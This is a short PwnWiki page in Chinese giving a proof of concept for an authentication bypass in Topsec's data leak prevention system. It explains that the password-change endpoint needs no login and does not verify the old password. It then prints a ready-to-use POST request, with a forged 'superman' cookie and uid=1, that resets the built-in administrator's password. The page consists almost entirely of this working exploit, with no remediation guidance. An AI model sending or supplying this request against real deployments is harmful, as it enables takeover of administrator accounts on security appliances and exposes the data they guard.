天融信數據防洩漏系統越權修改管理員密碼漏洞

From PwnWiki

Revision as of 18:19, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== 無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd，接口未授權訪問,造成直接修改任意用戶密碼，...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd，接口未授權訪問,造成直接修改任意用戶密碼，默認superman賬戶uid為1

POST /?module=auth_user&action=mod_edit_pwd 
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

Retrieved from "https://pwnwiki.com/index.php?title=天融信數據防洩漏系統越權修改管理員密碼漏洞&oldid=1688"